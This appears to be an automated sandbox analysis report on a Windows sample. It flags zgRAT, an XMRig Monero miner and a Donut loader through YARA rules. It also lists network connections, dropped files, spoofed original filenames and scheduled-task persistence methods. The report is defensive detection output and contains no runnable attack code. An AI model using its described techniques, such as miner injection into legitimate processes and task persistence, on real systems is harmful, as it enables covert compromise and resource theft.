Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:50019 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000002.00000002.2015231668.000002A5B9B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

.NET source code contains very large array initializations

Source: zlONcFaXkc.exe, Program.cs

Large array initialization: Main: array initializer size 642620

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Process Stats: CPU usage > 49%

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8A1C44	0_2_00007FFD9B8A1C44
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8A1A51	0_2_00007FFD9B8A1A51
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B8A3FFA	0_2_00007FFD9B8A3FFA
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B971B44	0_2_00007FFD9B971B44
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9B973198	0_2_00007FFD9B973198
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Code function: 0_2_00007FFD9BA50140	0_2_00007FFD9BA50140
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D6C22	1_2_00007FFD9B8D6C22
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D5979	1_2_00007FFD9B8D5979
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8E1890	1_2_00007FFD9B8E1890
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8B8D50	1_2_00007FFD9B8B8D50
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8BA2E0	1_2_00007FFD9B8BA2E0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8BE610	1_2_00007FFD9B8BE610
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8B8A48	1_2_00007FFD9B8B8A48
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8C5F09	1_2_00007FFD9B8C5F09
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B8D5E76	1_2_00007FFD9B8D5E76
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B881C45	1_2_00007FFD9B881C45
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B881A51	1_2_00007FFD9B881A51
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B883FFA	1_2_00007FFD9B883FFA
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9B955C61	1_2_00007FFD9B955C61
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA4792D	1_2_00007FFD9BA4792D
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA47469	1_2_00007FFD9BA47469
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA37299	1_2_00007FFD9BA37299
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C9FB	1_2_00007FFD9BA3C9FB
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C231	1_2_00007FFD9BA3C231
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C985	1_2_00007FFD9BA3C985
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3B1A0	1_2_00007FFD9BA3B1A0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA4E8FA	1_2_00007FFD9BA4E8FA
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C126	1_2_00007FFD9BA3C126
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C6A0	1_2_00007FFD9BA3C6A0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA415F9	1_2_00007FFD9BA415F9
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA4E5C7	1_2_00007FFD9BA4E5C7
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Code function: 1_2_00007FFD9BA3C4D3	1_2_00007FFD9BA3C4D3
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B863BA	2_2_000002A5B9B863BA
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B8678A	2_2_000002A5B9B8678A
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B86BC2	2_2_000002A5B9B86BC2
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B89E86	2_2_000002A5B9B89E86
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B854DA	2_2_000002A5B9B854DA
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Code function: 2_2_000002A5B9B8762E	2_2_000002A5B9B8762E

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508

PE file does not import any functions

Source: Target.exe.0.dr	Static PE information: No import functions for PE file found
Source: zlONcFaXkc.exe	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe	Binary or memory string: OriginalFilenameZldnf.exe" vs zlONcFaXkc.exe

Yara signature match

Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000002.00000002.2015231668.000002A5B9B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: zlONcFaXkc.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Target.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
